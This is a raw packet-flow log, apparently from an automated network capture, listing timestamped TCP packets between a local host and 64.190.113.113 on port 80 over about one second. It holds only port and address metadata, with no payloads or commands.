Jul 27, 2024 07:30:08.968590975 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968606949 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968621969 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.968770027 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968770027 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968770027 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.968770027 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.969008923 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969024897 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969038963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969053984 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969069004 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969084024 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969099045 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.969692945 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.969692945 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.969692945 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970437050 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970494986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970510960 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970556974 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970556974 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970659971 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970675945 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970690966 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970707893 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970756054 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970756054 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970823050 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970838070 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970869064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970884085 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970899105 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970915079 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970932961 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.970963001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970963001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.970963001 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971177101 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971200943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971218109 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971235991 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971240044 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971251965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971301079 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971301079 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971518040 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971534014 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971549034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971564054 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971579075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971595049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971640110 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971640110 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971640110 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971867085 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971883059 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971898079 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971913099 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971929073 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971944094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971950054 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971950054 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.971960068 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971976042 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.971991062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972007036 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972023964 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972039938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972122908 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972122908 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972122908 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972122908 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972368002 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972611904 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972640991 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972656012 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972670078 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972685099 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972698927 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:08.972744942 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972744942 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:08.972744942 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.022634029 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.051841021 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.051872015 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.051888943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.051903963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.051922083 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.051938057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052047968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052066088 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052082062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052098036 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052253962 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.052253962 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.052400112 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052417040 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052437067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052455902 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052470922 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052505016 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052520990 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052536011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.052551985 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053040981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053057909 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053070068 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.053073883 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053091049 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053106070 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053121090 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053138018 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053153038 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053168058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053184986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053200006 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053208113 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053215981 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053224087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053334951 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.053951025 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.053970098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054032087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054048061 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054064035 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054078102 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054092884 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054107904 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054124117 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054140091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054156065 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054171085 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054184914 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054200888 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054510117 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.054810047 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054828882 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054843903 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054861069 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054876089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054891109 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054907084 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054923058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054939032 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054953098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054968119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054982901 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.054999113 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055015087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055762053 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055780888 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055797100 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055813074 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055828094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055844069 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055859089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055874109 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055888891 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055903912 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055918932 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055936098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055951118 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.055967093 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056368113 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.056368113 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.056683064 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056700945 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056715965 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056730986 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056746006 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056761026 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056776047 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056791067 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056806087 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056822062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056835890 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056852102 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056866884 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056881905 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.056895971 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057002068 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.057661057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057681084 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057696104 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057710886 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057727098 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057742119 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057756901 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057771921 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057786942 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057801962 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057816982 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057832956 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057848930 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057864904 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.057879925 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.058000088 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.058419943 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.058439016 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.058468103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.058485031 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.058828115 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.148673058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148724079 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148742914 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148761034 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148780107 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148797035 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148813963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.148833036 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149023056 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149023056 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149023056 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149039030 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149060011 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149090052 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149108887 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149127960 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149149895 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149224043 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149224043 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149224043 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149394989 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149414062 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149432898 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149451017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149470091 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149487972 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149590015 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149605989 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149622917 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149655104 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149672985 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149691105 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149709940 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149728060 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149745941 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149750948 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149750948 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149750948 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149750948 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149765968 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149785995 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.149815083 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149815083 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.149815083 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150131941 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150340080 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150356054 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150374889 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150393963 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150412083 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150429964 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150446892 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150465012 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150484085 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150501013 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150518894 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150538921 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150549889 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150557041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150578022 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150595903 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.150648117 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.150648117 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151300907 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151321888 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151340961 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151355982 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151375055 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151393890 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151411057 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151428938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151452065 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151470900 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151488066 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151506901 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151525021 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151544094 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151561975 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151582003 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151614904 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.151635885 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152241945 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152261972 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152281046 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152298927 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152317047 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152335882 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152353048 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152370930 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152390003 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152409077 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152426958 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152430058 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152430058 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152430058 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152446985 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152466059 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152501106 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152508974 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152508974 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152520895 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.152539968 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.152616978 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.153145075 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153165102 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153182983 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153201103 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153219938 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153238058 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153255939 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153274059 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153287888 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.153287888 CEST	51808	80	192.168.2.5	64.190.113.113
Jul 27, 2024 07:30:09.153294086 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153312922 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153331041 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153348923 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153366089 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153383017 CEST	80	51808	64.190.113.113	192.168.2.5
Jul 27, 2024 07:30:09.153400898 CEST	80	51808	64.190.113.113	192.168.2.5
